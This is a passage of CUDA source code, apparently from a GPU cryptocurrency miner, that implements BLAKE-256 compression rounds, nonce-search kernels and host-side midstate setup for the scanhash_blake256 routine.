c_u256[6];\r\n\tv[15] = c_u256[7];\r\n\r\n\t//\t{ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15 },\r\n\tGSPREC(0, 4, 0x8, 0xC,0,1);\r\n\tGSPREC(1, 5, 0x9, 0xD,2,3);\r\n\tGSPREC(2, 6, 0xA, 0xE, 4,5);\r\n\tGSPREC(3, 7, 0xB, 0xF, 6,7);\r\n\tGSPREC(0, 5, 0xA, 0xF, 8,9);\r\n\tGSPREC(1, 6, 0xB, 0xC, 10,11);\r\n\tGSPREC(2, 7, 0x8, 0xD, 12,13);\r\n\tGSPREC(3, 4, 0x9, 0xE, 14,15);\r\n\t//\t{ 14, 10, 4, 8, 9, 15, 13, 6, 1, 12, 0, 2, 11, 7, 5, 3 },\r\n\tGSPREC(0, 4, 0x8, 0xC, 14, 10);\r\n\tGSPREC(1, 5, 0x9, 0xD, 4, 8);\r\n\tGSPREC(2, 6, 0xA, 0xE, 9, 15);\r\n\tGSPREC(3, 7, 0xB, 0xF, 13, 6);\r\n\tGSPREC(0, 5, 0xA, 0xF, 1, 12);\r\n\tGSPREC(1, 6, 0xB, 0xC, 0, 2);\r\n\tGSPREC(2, 7, 0x8, 0xD, 11, 7);\r\n\tGSPREC(3, 4, 0x9, 0xE, 5, 3);\r\n\t//\t{ 11, 8, 12, 0, 5, 2, 15, 13, 10, 14, 3, 6, 7, 1, 9, 4 },\r\n\tGSPREC(0, 4, 0x8, 0xC, 11, 8);\r\n\tGSPREC(1, 5, 0x9, 0xD, 12, 0);\r\n\tGSPREC(2, 6, 0xA, 0xE, 5, 2);\r\n\tGSPREC(3, 7, 0xB, 0xF, 15, 13);\r\n\tGSPREC(0, 5, 0xA, 0xF, 10, 14);\r\n\tGSPREC(1, 6, 0xB, 0xC, 3, 6);\r\n\tGSPREC(2, 7, 0x8, 0xD, 7, 1);\r\n\tGSPREC(3, 4, 0x9, 0xE, 9, 4);\r\n\t//\t{ 7, 9, 3, 1, 13, 12, 11, 14, 2, 6, 5, 10, 4, 0, 15, 8 },\r\n\tGSPREC(0, 4, 0x8, 0xC, 7, 9);\r\n\tGSPREC(1, 5, 0x9, 0xD, 3, 1);\r\n\tGSPREC(2, 6, 0xA, 0xE, 13, 12);\r\n\tGSPREC(3, 7, 0xB, 0xF, 11, 14);\r\n\tGSPREC(0, 5, 0xA, 0xF, 2, 6);\r\n\tGSPREC(1, 6, 0xB, 0xC, 5, 10);\r\n\tGSPREC(2, 7, 0x8, 0xD, 4, 0);\r\n\tGSPREC(3, 4, 0x9, 0xE, 15, 8);\r\n\r\n\t//\t{ 9, 0, 5, 7, 2, 4, 10, 15, 14, 1, 11, 12, 6, 8, 3, 13 },\r\n\tGSPREC(0, 4, 0x8, 0xC, 9, 0);\r\n\tGSPREC(1, 5, 0x9, 0xD, 5, 7);\r\n\tGSPREC(2, 6, 0xA, 0xE, 2, 4);\r\n\tGSPREC(3, 7, 0xB, 0xF, 10, 15);\r\n\tGSPREC(0, 5, 0xA, 0xF, 14, 1);\r\n\tGSPREC(1, 6, 0xB, 0xC, 11, 12);\r\n\tGSPREC(2, 7, 0x8, 0xD, 6, 8);\r\n\tGSPREC(3, 4, 0x9, 0xE, 3, 13);\r\n\t//\t{ 2, 12, 6, 10, 0, 11, 8, 3, 4, 13, 7, 5, 15, 14, 1, 9 },\r\n\tGSPREC(0, 4, 0x8, 0xC, 2, 12);\r\n\tGSPREC(1, 5, 0x9, 0xD, 6, 10);\r\n\tGSPREC(2, 6, 0xA, 0xE, 0, 11);\r\n\tGSPREC(3, 7, 0xB, 0xF, 8, 3);\r\n\tGSPREC(0, 5, 0xA, 0xF, 4, 13);\r\n\tGSPREC(1, 6, 0xB, 0xC, 7, 5);\r\n\tGSPREC(2, 7, 0x8, 0xD, 15, 14);\r\n\tGSPREC(3, 4, 0x9, 0xE, 1, 9);\r\n\r\n\t//\t{ 12, 5, 1, 15, 14, 13, 4, 10, 0, 7, 6, 3, 9, 2, 8, 11 },\r\n\tGSPREC(0, 4, 0x8, 0xC, 12, 5);\r\n\tGSPREC(1, 5, 0x9, 0xD, 1, 15);\r\n\tGSPREC(2, 6, 0xA, 0xE, 14, 13);\r\n\tGSPREC(3, 7, 0xB, 0xF, 4, 10);\r\n\tGSPREC(0, 5, 0xA, 0xF, 0, 7);\r\n\tGSPREC(1, 6, 0xB, 0xC, 6, 3);\r\n\tGSPREC(2, 7, 0x8, 0xD, 9, 2);\r\n\tGSPREC(3, 4, 0x9, 0xE, 8, 11);\r\n\r\n//\t{ 13, 11, 7, 14, 12, 1, 3, 9, 5, 0, 15, 4, 8, 6, 2, 10 },\r\n\tGSPREC(0, 4, 0x8, 0xC, 13, 11);\r\n\tGSPREC(1, 5, 0x9, 0xD, 7, 14);\r\n\tGSPREC(2, 6, 0xA, 0xE, 12, 1);\r\n\tGSPREC(3, 7, 0xB, 0xF, 3, 9);\r\n\tGSPREC(0, 5, 0xA, 0xF, 5, 0);\r\n\tGSPREC(1, 6, 0xB, 0xC, 15, 4);\r\n\tGSPREC(2, 7, 0x8, 0xD, 8, 6);\r\n\tGSPREC(3, 4, 0x9, 0xE, 2, 10);\r\n//\t{ 6, 15, 14, 9, 11, 3, 0, 8, 12, 2, 13, 7, 1, 4, 10, 5 },\r\n\tGSPREC(0, 4, 0x8, 0xC, 6, 15);\r\n\tGSPREC(1, 5, 0x9, 0xD, 14, 9);\r\n\tGSPREC(2, 6, 0xA, 0xE, 11, 3);\r\n\tGSPREC(3, 7, 0xB, 0xF, 0, 8);\r\n\tGSPREC(0, 5, 0xA, 0xF, 12, 2);\r\n\tGSPREC(1, 6, 0xB, 0xC, 13, 7);\r\n\tGSPREC(2, 7, 0x8, 0xD, 1, 4);\r\n\tGSPREC(3, 4, 0x9, 0xE, 10, 5);\r\n//\t{ 10, 2, 8, 4, 7, 6, 1, 5, 15, 11, 9, 14, 3, 12, 13, 0 },\r\n\tGSPREC(0, 4, 0x8, 0xC, 10, 2);\r\n\tGSPREC(1, 5, 0x9, 0xD, 8, 4);\r\n\tGSPREC(2, 6, 0xA, 0xE, 7, 6);\r\n\tGSPREC(3, 7, 0xB, 0xF, 1, 5);\r\n\tGSPREC(0, 5, 0xA, 0xF, 15, 11);\r\n\tGSPREC(1, 6, 0xB, 0xC, 9, 14);\r\n\tGSPREC(2, 7, 0x8, 0xD, 3, 12);\r\n\tGSPREC(3, 4, 0x9, 0xE, 13, 0);\r\n//\t{ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15 },\r\n\tGSPREC(0, 4, 0x8, 0xC, 0, 1);\r\n\tGSPREC(1, 5, 0x9, 0xD, 2, 3);\r\n\tGSPREC(2, 6, 0xA, 0xE, 4, 5);\r\n\tGSPREC(3, 7, 0xB, 0xF, 6, 7);\r\n\tGSPREC(0, 5, 0xA, 0xF, 8, 9);\r\n\tGSPREC(1, 6, 0xB, 0xC, 10, 11);\r\n\tGSPREC(2, 7, 0x8, 0xD, 12, 13);\r\n\tGSPREC(3, 4, 0x9, 0xE, 14, 15);\r\n\r\n//\t{ 14, 10, 4, 8, 9, 15, 13, 6, 1, 12, 0, 2, 11, 7, 5, 3 },\r\n\tGSPREC(0, 4, 0x8, 0xC, 14, 10);\r\n\tGSPREC(1, 5, 0x9, 0xD, 4, 8);\r\n\tGSPREC(2, 6, 0xA, 0xE, 9, 15);\r\n\tGSPREC(3, 7, 0xB, 0xF, 13, 6);\r\n\tGSPREC(0, 5, 0xA, 0xF, 1, 12);\r\n\tGSPREC(1, 6, 0xB, 0xC, 0, 2);\r\n\tGSPREC(2, 7, 0x8, 0xD, 11, 7);\r\n\tGSPREC(3, 4, 0x9, 0xE, 5, 3);\r\n\r\n//\t{ 11, 8, 12, 0, 5, 2, 15, 13, 10, 14, 3, 6, 7, 1, 9, 4 },\r\n\tGSPREC(0, 4, 0x8, 0xC, 11, 8);\r\n\tGSPREC(1, 5, 0x9, 0xD, 12, 0);\r\n\tGSPREC(2, 6, 0xA, 0xE, 5, 2);\r\n\tGSPREC(3, 7, 0xB, 0xF, 15, 13);\r\n\tGSPREC(0, 5, 0xA, 0xF, 10, 14);\r\n\tGSPREC(1, 6, 0xB, 0xC, 3, 6);\r\n\tGSPREC(2, 7, 0x8, 0xD, 7, 1);\r\n\tGSPREC(3, 4, 0x9, 0xE, 9, 4);\r\n\t//\t{ 7, 9, 3, 1, 13, 12, 11, 14, 2, 6, 5, 10, 4, 0, 15, 8 },\r\n\tGSPREC(0, 4, 0x8, 0xC, 7, 9);\r\n\tGSPREC(1, 5, 0x9, 0xD, 3, 1);\r\n\tGSPREC(2, 6, 0xA, 0xE, 13, 12);\r\n\tGSPREC(3, 7, 0xB, 0xF, 11, 14);\r\n\tGSPREC(0, 5, 0xA, 0xF, 2, 6);\r\n\tGSPREC(1, 6, 0xB, 0xC, 5, 10);\r\n\tGSPREC(2, 7, 0x8, 0xD, 4, 0);\r\n//\tGSPREC(3, 4, 0x9, 0xE, 15, 8);\r\n\r\n\r\n#if PRECALC64\r\n\t// only compute h6 & 7\r\n//\th[6U] ^= v[6U] ^ v[14U];\r\n\th[7] ^= v[7] ^ v[15];\r\n#else\r\n\t//#pragma unroll 16\r\n\tfor (uint32_t i = 0; i < 16; i++) {\r\n\t\tuint32_t j = i & 7U;\r\n\t\th[j] ^= v[i];\r\n\t}\r\n#endif\r\n}\r\n\r\n\r\n/* Second part (64-80) msg never change, store it */\r\n__device__ static\r\nvoid blake256_compress_8(uint32_t *const __restrict__ h, const uint32_t *const __restrict__ block)\r\n{\r\n\tuint32_t /*_ALIGN(8)*/ m[16];\r\n\tuint32_t v[16];\r\n\r\n\tm[0] = block[0];\r\n\tm[1] = block[1];\r\n\tm[2] = block[2];\r\n\tm[3] = block[3];\r\n\r\n\tconst uint32_t c_u256[16] = \r\n\t{\r\n\t\tSPH_C32(0x243F6A88), SPH_C32(0x85A308D3),\r\n\t\tSPH_C32(0x13198A2E), SPH_C32(0x03707344),\r\n\t\tSPH_C32(0xA4093822), SPH_C32(0x299F31D0),\r\n\t\tSPH_C32(0x082EFA98), SPH_C32(0xEC4E6C89),\r\n\t\tSPH_C32(0x452821E6), SPH_C32(0x38D01377),\r\n\t\tSPH_C32(0xBE5466CF), SPH_C32(0x34E90C6C),\r\n\t\tSPH_C32(0xC0AC29B7), SPH_C32(0xC97C50DD),\r\n\t\tSPH_C32(0x3F84D5B5), SPH_C32(0xB5470917)\r\n\t};\r\n\r\n\tconst uint32_t c_Padding[16] = {\r\n\t\t0, 0, 0, 0,\r\n\t\t0x80000000UL, 0, 0, 0,\r\n\t\t0, 0, 0, 0,\r\n\t\t0, 1, 0, 640,\r\n\t};\r\n\r\n\r\n#pragma unroll\r\n\tfor (int i = 4; i < 16; i++) \r\n\t{\r\n\t\tm[i] = c_Padding[i];\r\n\t}\r\n\r\n#pragma unroll\r\n\tfor(int i = 0; i < 8; i++)\r\n\t\tv[i] = h[i];\r\n\r\n\tv[ 9] = c_u256[1];\r\n\tv[10] = c_u256[2];\r\n\tv[11] = c_u256[3];\r\n\r\n\tv[13] = c_u256[5] ^ 640;\r\n\tv[14] = c_u256[6];\r\n\tv[15] = c_u256[7];\r\n\r\n\tv[0] = d_data[11];\r\n\tv[4] = d_data[12];\r\n\tv[8] = d_data[13];\r\n\tv[12] = d_data[14];\r\n\r\n\tGSPREC(1, 5, 0x9, 0xD,2,3);\r\n\tGSPREC(2, 6, 0xA, 0xE, 4,5);\r\n\tGSPREC(3, 7, 0xB, 0xF, 6,7);\r\n\tGSPREC(0, 5, 0xA, 0xF, 8,9);\r\n\tGSPREC(1, 6, 0xB, 0xC, 10,11);\r\n\tGSPREC(2, 7, 0x8, 0xD, 12,13);\r\n\tGSPREC(3, 4, 0x9, 0xE, 14,15);\r\n\t//\t{ 14, 10, 4, 8, 9, 15, 13, 6, 1, 12, 0, 2, 11, 7, 5, 3 },\r\n\tGSPREC(0, 4, 0x8, 0xC, 14, 10);\r\n\tGSPREC(1, 5, 0x9, 0xD, 4, 8);\r\n\tGSPREC(2, 6, 0xA, 0xE, 9, 15);\r\n\tGSPREC(3, 7, 0xB, 0xF, 13, 6);\r\n\tGSPREC(0, 5, 0xA, 0xF, 1, 12);\r\n\tGSPREC(1, 6, 0xB, 0xC, 0, 2);\r\n\tGSPREC(2, 7, 0x8, 0xD, 11, 7);\r\n\tGSPREC(3, 4, 0x9, 0xE, 5, 3);\r\n\t//\t{ 11, 8, 12, 0, 5, 2, 15, 13, 10, 14, 3, 6, 7, 1, 9, 4 },\r\n\tGSPREC(0, 4, 0x8, 0xC, 11, 8);\r\n\tGSPREC(1, 5, 0x9, 0xD, 12, 0);\r\n\tGSPREC(2, 6, 0xA, 0xE, 5, 2);\r\n\tGSPREC(3, 7, 0xB, 0xF, 15, 13);\r\n\tGSPREC(0, 5, 0xA, 0xF, 10, 14);\r\n\tGSPREC(1, 6, 0xB, 0xC, 3, 6);\r\n\tGSPREC(2, 7, 0x8, 0xD, 7, 1);\r\n\tGSPREC(3, 4, 0x9, 0xE, 9, 4);\r\n\t//\t{ 7, 9, 3, 1, 13, 12, 11, 14, 2, 6, 5, 10, 4, 0, 15, 8 },\r\n\tGSPREC(0, 4, 0x8, 0xC, 7, 9);\r\n\tGSPREC(1, 5, 0x9, 0xD, 3, 1);\r\n\tGSPREC(2, 6, 0xA, 0xE, 13, 12);\r\n\tGSPREC(3, 7, 0xB, 0xF, 11, 14);\r\n\tGSPREC(0, 5, 0xA, 0xF, 2, 6);\r\n\tGSPREC(1, 6, 0xB, 0xC, 5, 10);\r\n\tGSPREC(2, 7, 0x8, 0xD, 4, 0);\r\n\tGSPREC(3, 4, 0x9, 0xE, 15, 8);\r\n\r\n\t//\t{ 9, 0, 5, 7, 2, 4, 10, 15, 14, 1, 11, 12, 6, 8, 3, 13 },\r\n\tGSPREC(0, 4, 0x8, 0xC, 9, 0);\r\n\tGSPREC(1, 5, 0x9, 0xD, 5, 7);\r\n\tGSPREC(2, 6, 0xA, 0xE, 2, 4);\r\n\tGSPREC(3, 7, 0xB, 0xF, 10, 15);\r\n\tGSPREC(0, 5, 0xA, 0xF, 14, 1);\r\n\tGSPREC(1, 6, 0xB, 0xC, 11, 12);\r\n\tGSPREC(2, 7, 0x8, 0xD, 6, 8);\r\n\tGSPREC(3, 4, 0x9, 0xE, 3, 13);\r\n\t//\t{ 2, 12, 6, 10, 0, 11, 8, 3, 4, 13, 7, 5, 15, 14, 1, 9 },\r\n\tGSPREC(0, 4, 0x8, 0xC, 2, 12);\r\n\tGSPREC(1, 5, 0x9, 0xD, 6, 10);\r\n\tGSPREC(2, 6, 0xA, 0xE, 0, 11);\r\n\tGSPREC(3, 7, 0xB, 0xF, 8, 3);\r\n\tGSPREC(0, 5, 0xA, 0xF, 4, 13);\r\n\tGSPREC(1, 6, 0xB, 0xC, 7, 5);\r\n\tGSPREC(2, 7, 0x8, 0xD, 15, 14);\r\n\tGSPREC(3, 4, 0x9, 0xE, 1, 9);\r\n\r\n\t//\t{ 12, 5, 1, 15, 14, 13, 4, 10, 0, 7, 6, 3, 9, 2, 8, 11 },\r\n\tGSPREC(0, 4, 0x8, 0xC, 12, 5);\r\n\tGSPREC(1, 5, 0x9, 0xD, 1, 15);\r\n\tGSPREC(2, 6, 0xA, 0xE, 14, 13);\r\n\tGSPREC(3, 7, 0xB, 0xF, 4, 10);\r\n\tGSPREC(0, 5, 0xA, 0xF, 0, 7);\r\n\tGSPREC(1, 6, 0xB, 0xC, 6, 3);\r\n\tGSPREC(2, 7, 0x8, 0xD, 9, 2);\r\n\tGSPREC(3, 4, 0x9, 0xE, 8, 11);\r\n\r\n\t//\t{ 13, 11, 7, 14, 12, 1, 3, 9, 5, 0, 15, 4, 8, 6, 2, 10 },\r\n\tGSPREC(0, 4, 0x8, 0xC, 13, 11);\r\n\tGSPREC(1, 5, 0x9, 0xD, 7, 14);\r\n\tGSPREC(2, 6, 0xA, 0xE, 12, 1);\r\n\tGSPREC(3, 7, 0xB, 0xF, 3, 9);\r\n\tGSPREC(0, 5, 0xA, 0xF, 5, 0);\r\n\tGSPREC(1, 6, 0xB, 0xC, 15, 4);\r\n\tGSPREC(2, 7, 0x8, 0xD, 8, 6);\r\n//\tGSPREC(3, 4, 0x9, 0xE, 2, 10);\r\n\t//\t{ 6, 15, 14, 9, 11, 3, 0, 8, 12, 2, 13, 7, 1, 4, 10, 5 },\r\n\r\n\r\n#if PRECALC64\r\n\t// only compute h6 & 7\r\n//\th[6] ^= v[6] ^ v[14];\r\n\th[7] ^= v[7] ^ v[15];\r\n#else\r\n\t//#pragma unroll 16\r\n\tfor (uint32_t i = 0; i < 16; i++) {\r\n\t\tuint32_t j = i & 7U;\r\n\t\th[j] ^= v[i];\r\n\t}\r\n#endif\r\n}\r\n\r\n\r\n#if !PRECALC64 /* original method */\r\n__global__\r\nvoid blake256_gpu_hash_80(const uint32_t threads, const uint32_t startNonce, uint32_t *resNonce,\r\n\tconst uint64_t highTarget, const int crcsum, const int rounds)\r\n{\r\n\tconst uint32_t thread = (blockDim.x * blockIdx.x + threadIdx.x);\r\n\tif (thread < threads)\r\n\t{\r\n\t\tconst uint32_t nonce = startNonce + thread;\r\n\t\tuint32_t h[8];\r\n\r\n\t\t#pragma unroll\r\n\t\tfor(int i=0; i<8; i++) {\r\n\t\t\th[i] = c_IV256[i];\r\n\t\t}\r\n\r\n\t\tif (crcsum != prevsum) {\r\n\t\t\tprevsum = crcsum;\r\n\t\t\tblake256_compress(h, c_data, 512, rounds);\r\n\t\t\t#pragma unroll\r\n\t\t\tfor(int i=0; i<8; i++) {\r\n\t\t\t\tcache[i] = h[i];\r\n\t\t\t}\r\n\t\t} else {\r\n\t\t\t#pragma unroll\r\n\t\t\tfor(int i=0; i<8; i++) {\r\n\t\t\t\th[i] = cache[i];\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\t// ------ Close: Bytes 64 to 80 ------\r\n\r\n\t\tuint32_t ending[4];\r\n\t\tending[0] = c_data[16];\r\n\t\tending[1] = c_data[17];\r\n\t\tending[2] = c_data[18];\r\n\t\tending[3] = nonce; /* our tested value */\r\n\r\n\t\tblake256_compress(h, ending, 640, rounds);\r\n\r\n\t\t// not sure why, h[7] is ok\r\n\t\th[6] = cuda_swab32(h[6]);\r\n\r\n\t\t// compare count of leading zeros h[6] + h[7]\r\n\t\tuint64_t high64 = ((uint64_t*)h)[3];\r\n\t\tif (high64 <= highTarget)\r\n#if NBN == 2\r\n\t\t/* keep the smallest nonce, + extra one if found */\r\n\t\tif (resNonce[0] > nonce) {\r\n\t\t\t// printf(\"%llx %llx \\n\", high64, highTarget);\r\n\t\t\tresNonce[1] = resNonce[0];\r\n\t\t\tresNonce[0] = nonce;\r\n\t\t}\r\n\t\telse\r\n\t\t\tresNonce[1] = nonce;\r\n#else\r\n\t\tresNonce[0] = nonce;\r\n#endif\r\n\t}\r\n}\r\n\r\n__host__\r\nuint32_t blake256_cpu_hash_80(const int thr_id, const uint32_t threads, const uint32_t startNonce, const uint64_t highTarget,\r\n\tconst uint32_t crcsum, const int8_t rounds)\r\n{\r\n\tuint32_t result = UINT32_MAX;\r\n\r\n\tdim3 grid((threads + TPB-1)/TPB);\r\n\tdim3 block(TPB);\r\n\t/* Check error on Ctrl+C or kill to prevent segfaults on exit */\r\n\tif (cudaMemset(d_resNonce[thr_id], 0xff, NBN*sizeof(uint32_t)) != cudaSuccess)\r\n\t\treturn result;\r\n\r\n\tblake256_gpu_hash_80<<<grid, block, 0, gpustream[thr_id]>>>(threads, startNonce, d_resNonce[thr_id], highTarget, crcsum, (int) rounds);\r\n\t//cudaDeviceSynchronize();\r\n\tif (cudaSuccess == cudaMemcpyAsync(h_resNonce[thr_id], d_resNonce[thr_id], NBN*sizeof(uint32_t), cudaMemcpyDeviceToHost)) {\r\n\t\t//cudaDeviceSynchronize(); /* seems no more required */\r\n\t\tresult = h_resNonce[thr_id][0];\r\n\t\tfor (int n=0; n < (NBN-1); n++)\r\n\t\t\textra_results[thr_id][n] = h_resNonce[thr_id][n+1];\r\n\t}\r\n\treturn result;\r\n}\r\n\r\n__host__\r\nvoid blake256_cpu_setBlock_80(int thr_id, uint32_t *pdata, const uint32_t *ptarget)\r\n{\r\n\tuint32_t data[20];\r\n\tmemcpy(data, pdata, 80);\r\n\tCUDA_SAFE_CALL(cudaMemcpyToSymbolAsync(c_data, data, sizeof(data), 0, cudaMemcpyHostToDevice));\r\n}\r\n#else\r\n\r\n/* ############################################################################################################################### */\r\n/* Precalculated 1st 64-bytes block (midstate) method */\r\n\r\n__global__\r\nvoid blake256_gpu_hash_16(const uint32_t threads, const uint32_t startNonce, uint32_t *resNonce,\r\n                          const uint32_t Target6, const uint32_t Target7, const int rounds, const bool trace)\r\n{\r\n\tconst uint32_t thread = (blockDim.x * blockIdx.x + threadIdx.x);\r\n//\tif (thread < threads)\r\n\t{\r\n\t\tconst uint32_t nonce = startNonce + thread;\r\n\t\tuint32_t _ALIGN(16) h[8];\r\n\r\n\t\t#pragma unroll\r\n\t\tfor(int i=0; i < 8; i++) {\r\n\t\t\th[i] = d_data[i];\r\n\t\t}\r\n\r\n\t\t// ------ Close: Bytes 64 to 80 ------\r\n\r\n\t\tuint32_t _ALIGN(16) ending[4];\r\n\t\tending[0] = d_data[8];\r\n\t\tending[1] = d_data[9];\r\n\t\tending[2] = d_data[10];\r\n\t\tending[3] = nonce; /* our tested value */\r\n\r\n\t\tblake256_compress(h, ending, 640, rounds);\r\n\r\n\t\tif (h[7] <= Target7)\r\n\t\t{\r\n#if NBN == 2\r\n\t\t\tuint32_t tmp = atomicCAS(resNonce, 0xffffffff, nonce);\r\n\t\t\tif(tmp != 0xffffffff)\r\n\t\t\t\tresNonce[1] = nonce;\r\n#else\r\n\t\t\tresNonce[0] = nonce;\r\n#endif\r\n#ifdef _DEBUG\r\n\t\t\tif (trace) {\r\n\t\t\t\tuint64_t high64 = ((uint64_t*)h)[3];\r\n\t\t\t\tprintf(\"gpu:  %16llx\\n\", high64);\r\n\t\t\t\tprintf(\"gpu: %08x.%08x\\n\", h[7], h[6]);\r\n\t\t\t\tprintf(\"tgt:  %16llx\\n\", highTarget);\r\n\t\t\t}\r\n#endif\r\n\t\t}\r\n\t}\r\n}\r\n\r\n\r\n__global__\r\nvoid blake256_gpu_hash_16_8(const uint32_t threads, const uint32_t startNonce, uint32_t *resNonce,\r\n                            const uint32_t Target6, const uint32_t Target7, const int rounds, const bool trace)\r\n{\r\n\tconst uint32_t thread = (blockDim.x * blockIdx.x + threadIdx.x);\r\n//\tif (thread < threads)\r\n\t{\r\n\t\tconst uint32_t nonce = startNonce + thread;\r\n\t\tuint32_t _ALIGN(16) h[8];\r\n\r\n#pragma unroll\r\n\t\tfor (int i = 0; i < 8; i++)\r\n\t\t\th[i] = d_data[i];\r\n\r\n\t\t// ------ Close: Bytes 64 to 80 ------\r\n\r\n\t\tuint32_t _ALIGN(16) ending[4];\r\n\t\tending[0] = d_data[8];\r\n\t\tending[1] = d_data[9];\r\n\t\tending[2] = d_data[10];\r\n\t\tending[3] = nonce; /* our tested value */\r\n\r\n\t\tblake256_compress_8(h, ending);\r\n\r\n\t\tif (h[7] <= Target7)\r\n\t\t{\r\n#if NBN == 2\r\n\t\t\tuint32_t tmp = atomicCAS(resNonce, 0xffffffff, nonce);\r\n\t\t\tif(tmp != 0xffffffff)\r\n\t\t\t\tresNonce[1] = nonce;\r\n#else\r\n\t\t\tresNonce[0] = nonce;\r\n#endif\r\n#ifdef _DEBUG\r\n\t\t\tif (trace) {\r\n\t\t\t\tuint64_t high64 = ((uint64_t*)h)[3];\r\n\t\t\t\tprintf(\"gpu:  %16llx\\n\", high64);\r\n\t\t\t\tprintf(\"gpu: %08x.%08x\\n\", h[7], h[6]);\r\n\t\t\t\tprintf(\"tgt:  %16llx\\n\", highTarget);\r\n\t\t\t}\r\n#endif\r\n\t\t}\r\n\t}\r\n}\r\n\r\n\r\n__host__\r\nstatic uint32_t blake256_cpu_hash_16(const int thr_id, const uint32_t threads, const uint32_t startNonce, const uint32_t Target6, const uint32_t Target7,\r\n\tconst int8_t rounds)\r\n{\r\n\tuint32_t result = UINT32_MAX;\r\n\r\n\tdim3 grid((threads + TPB-1)/TPB);\r\n\tdim3 block(TPB);\r\n\r\n\tCUDA_SAFE_CALL(cudaMemsetAsync(d_resNonce[thr_id], 0xff, NBN*sizeof(uint32_t), gpustream[thr_id]));\r\n\r\n\tif(rounds == 8)\r\n\t\tblake256_gpu_hash_16_8 << <grid, block, 0, gpustream[thr_id] >> > (threads, startNonce, d_resNonce[thr_id], Target6, Target7, (int)rounds, opt_tracegpu);\r\n\telse\r\n\t{\r\n\t\tif(rounds == 14)\r\n\t\t\tblake256_gpu_hash_16 << <grid, block, 0, gpustream[thr_id] >> > (threads, startNonce, d_resNonce[thr_id], Target6, Target7, (int)rounds, opt_tracegpu);\r\n\t\telse\r\n\t\t\tapplog(LOG_ERR, \"Number of blake rounds not supported\");\r\n\t}\r\n\tCUDA_SAFE_CALL(cudaMemcpyAsync(h_resNonce, d_resNonce[thr_id], NBN*sizeof(uint32_t), cudaMemcpyDeviceToHost, gpustream[thr_id])); cudaStreamSynchronize(gpustream[thr_id]);\r\n\tCUDA_SAFE_CALL(cudaStreamSynchronize(gpustream[thr_id]));\r\n\tresult = h_resNonce[0];\r\n\r\n\tfor (int n=0; n < (NBN-1); n++)\r\n\t\textra_results[thr_id][n] = h_resNonce[n + 1];\r\n\treturn result;\r\n}\r\n\r\n__host__\r\nstatic void blake256mid(uint32_t *output, const uint32_t *input, int8_t rounds = 14)\r\n{\r\n\tsph_blake256_context ctx;\r\n\r\n\t/* in sph_blake.c */\r\n\tblake256_rounds = rounds;\r\n\r\n\tsph_blake256_init(&ctx);\r\n\tsph_blake256(&ctx, input, 64);\r\n\r\n\tmemcpy(output, (void*)ctx.H, 32);\r\n}\r\n\r\n__host__\r\nstatic void blake256_cpu_setBlock_16(int thr_id, uint32_t *penddata, const uint32_t *midstate, const uint32_t *ptarget)\r\n{\r\n\tmemcpy(h_data, midstate, 32);\r\n\th_data[8] = penddata[0];\r\n\th_data[9] = penddata[1];\r\n\th_data[10] = penddata[2];\r\n\r\n\t// precalc v[0], v[4], v[8], v[12]\r\n\th_data[11] = h_data[0] + (h_data[8] ^ 0x85A308D3) + h_data[4];\r\n\th_data[14] = ROTL32(0xA4093822 ^ 640 ^ h_data[11], 16);\r\n\th_data[13] = 0x243F6A88 + h_data[14];\r\n\th_data[12] = ROTR32(h_data[4] ^ h_data[13], 12);\r\n\th_data[11] += (h_data[9] ^ 0x243F6A88) + h_data[12];\r\n\th_data[14] = ROTR32(h_data[14] ^ h_data[11], 8);\r\n\th_data[13] += h_data[14];\r\n\th_data[12] = ROTR32(h_data[12] ^ h_data[13], 7);\r\n\r\n\tCUDA_SAFE_CALL(cudaMemcpyToSymbolAsync(d_data, h_data, 15 * 4, 0, cudaMemcpyHostToDevice, gpustream[thr_id]));\r\n}\r\n#endif\r\n\r\nextern int scanhash_blake256(int thr_id, uint32_t *pdata, uint32_t *ptarget,\r\n\tuint32_t max_nonce, uint32_t *hashes_done, int8_t blakerounds=14)\r\n{\r\n\tconst uint32_t first_nonce = pdata[19];\r\n\tuint32_t _ALIGN(64) endiandata[20];\r\n#if PRECALC64\r\n\tuint32_t _ALIGN(64) midstate[8];\r\n#else\r\n\tuint32_t crcsum;\r\n#endif\r\n\tunsigned int intensity = 28;\r\n\tuint32_t throughput = device_intensity(device_map[thr_id], __func__, 1U << intensity);\r\n\tthroughput = min(throughput, max_nonce - first_nonce) & 0xfffffc00;\r\n\r\n\tint rc = 0;\r\n\r\n\tif (opt_benchmark)\r\n\t{\r\n\t\tptarget[7] = 0x00000000;\r\n\t\tptarget[6] = 0xffffffff;\r\n\t}\r\n\tuint32_t target6 = ptarget[6];\r\n\tuint32_t target7 = swab32(ptarget[7]); // don't ask me why\r\n\r\n\tif (opt_tracegpu)\r\n\t{\r\n\t\t/* test call from util.c */\r\n\t\tthroughput = 1;\r\n\t\tfor (int k = 0; k < 20; k++)\r\n\t\t\tpdata[k] = swab32(pdata[k]);\r\n\t}\r\n\r\n\tstatic THREAD volatile bool init = false;\r\n\tif(!init)\r\n\t{\r\n\t\tCUDA_SAFE_CALL(cudaSetDevice(device_map[thr_id]));\r\n\t\tcudaSetDeviceFlags(cudaDeviceScheduleBlockingSync);\r\n\t\tcudaDeviceSetCacheConfig(cudaFuncCachePreferL1);\r\n\t\tCUDA_SAFE_CALL(cudaStreamCreate(&gpustream[thr_id]));\r\n\t\tCUDA_SAFE_CALL(cudaMallocHost(&h_data, 15 * sizeof(uint32_t)));\r\n\t\tCUDA_SAFE_CALL(cudaMallocHost(&h_resNonce, NBN * sizeof(uint32_t)));\r\n\t\tCUDA_SAFE_CALL(cudaMalloc(&d_resNonce[thr_id], NBN * sizeof(uint32_t)));\r\n\t\tinit = true;\r\n\t}\r\n\r\n#if PRECALC64\r\n\tfor (int k = 0; k < 16; k++)\r\n\t\tbe32enc(&endiandata[k], pdata[k]);\r\n\tblake256mid(midstate, endiandata, blakerounds);\r\n\tblake256_cpu_setBlock_16(thr_id, &pdata[16], midstate, ptarget);\r\n#else\r\n\tblake256_cpu_setBlock_80(thr_id, pdata, ptarget);\r\n\tcrcsum = crc32_u32t(pdata, 64);\r\n#endif /* PRECALC64 */\r\n\r\n\tdo {\r\n#if PRECALC64\r\n\t\t// GPU HASH (second block only, first is midstate)\r\n\t\tuint32_t foundNonce =\tblake256_cpu_hash_16(thr_id, throughput, pdata[19], target6, target7, 